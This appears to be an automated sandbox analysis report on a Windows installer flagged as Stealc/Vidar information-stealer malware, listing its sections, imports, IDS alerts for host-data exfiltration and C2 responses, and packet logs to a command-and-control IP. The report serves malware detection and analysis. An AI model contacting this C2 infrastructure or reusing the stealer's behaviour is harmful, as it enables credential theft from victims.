                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                                                                                                  jne 00007F23B48E89EAh
                                                                                                                                                                                                                                                                                                  push 00000022h
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call 00007F23B48EADC1h
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                  jmp 00007F23B48E8A73h
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                                  cmp ax, bx
                                                                                                                                                                                                                                                                                                  jne 00007F23B48E89EAh
                                                                                                                                                                                                                                                                                                  add esi, 02h
                                                                                                                                                                                                                                                                                                  cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x698da.rsrc
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x13479c0x2860.rsrc
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                  .rsrc0x1000000x698da0x69a00e6d6fe85c71878ba00f98018544938aeFalse0.9763382951183432data7.920076863376912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .reloc0x16a0000xfd60x100073cd15b3d37d3a4f2ad84f805d510922False0.56884765625data5.323741431782735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                  RT_ICON0x1002980x5eb50PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998100123736853
                                                                                                                                                                                                                                                                                                  RT_ICON0x15ede80x65c9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0001151322101547
                                                                                                                                                                                                                                                                                                  RT_ICON0x1653b40x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.48677786818551666
                                                                                                                                                                                                                                                                                                  RT_ICON0x167a1c0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5448542805100182
                                                                                                                                                                                                                                                                                                  RT_ICON0x168b440x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6666666666666666
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x168fac0x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x1690ac0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                  RT_DIALOG0x1691c80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x1692280x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                                                                                  RT_VERSION0x1692740x390dataEnglishUnited States0.41228070175438597
                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x1696040x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                  2024-12-27T07:00:45.763263+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549762188.245.216.205443TCP
                                                                                                                                                                                                                                                                                                  2024-12-27T07:00:48.168332+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549768188.245.216.205443TCP
                                                                                                                                                                                                                                                                                                  2024-12-27T07:00:50.573984+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1188.245.216.205443192.168.2.549774TCP
                                                                                                                                                                                                                                                                                                  2024-12-27T07:00:53.193412+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11188.245.216.205443192.168.2.549780TCP

                                                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 06:59:54.232528925 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 06:59:54.232534885 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 06:59:54.341856956 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.841793060 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.841798067 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.951193094 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:06.413602114 CET4434970423.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:06.413701057 CET49704443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.268773079 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.268847942 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.269037962 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.279153109 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.279195070 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.739527941 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.739593983 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.819344044 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.819384098 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.819781065 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.819840908 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.821680069 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:39.867341042 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310513973 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310540915 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310566902 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310625076 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310631990 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.310672998 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.313066959 CET49750443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.313091040 CET44349750149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.462572098 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.462625980 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.462697983 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.462878942 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.462896109 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.366942883 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.367003918 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.371433973 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.371450901 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.371726990 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.371798038 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.372284889 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.373203039 CET4970380192.168.2.5192.229.211.108
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.419326067 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.492971897 CET8049703192.229.211.108192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:42.493055105 CET4970380192.168.2.5192.229.211.108
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.068298101 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.068373919 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.068397045 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.068442106 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.071760893 CET49756443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.071788073 CET44349756188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.073586941 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.073631048 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.073710918 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.073920012 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:43.073935986 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.859009981 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.860120058 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.860474110 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.860477924 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.862101078 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:44.862106085 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763293982 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763358116 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763382912 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763401031 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763428926 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763443947 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763694048 CET49762443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.763709068 CET44349762188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765193939 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765238047 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765292883 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765656948 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:45.765672922 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.257612944 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.257689953 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.258272886 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.258282900 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.259938002 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:47.259944916 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168311119 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168334961 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168399096 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168401957 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168423891 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168447971 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168689013 CET49768443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.168705940 CET44349768188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171089888 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171195030 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171279907 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171547890 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:48.171588898 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.672704935 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.672794104 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.673209906 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.673228025 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.674875021 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:49.674887896 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573801041 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573826075 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573895931 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573935032 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.573980093 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.574232101 CET49774443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.574259996 CET44349774188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575728893 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575777054 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.575851917 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.576251030 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:50.576261044 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976250887 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976330042 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976778030 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.976783991 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.978234053 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:51.978238106 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193248034 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193314075 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193329096 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193373919 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193582058 CET49780443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.193597078 CET44349780188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217722893 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217855930 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.217947960 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.218122959 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:53.218153954 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.258678913 CET49789443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.258821011 CET44349789188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.258934975 CET49789443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.262106895 CET49789443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.262142897 CET44349789188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.668602943 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.668785095 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.669193029 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.669209003 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.671068907 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.671086073 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.671158075 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:54.671188116 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.677159071 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.677238941 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.677269936 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.677349091 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.678162098 CET49786443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.678205967 CET44349786188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.708574057 CET44349789188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.710172892 CET49789443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.710486889 CET49789443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:55.710498095 CET44349789188.245.216.205192.168.2.5
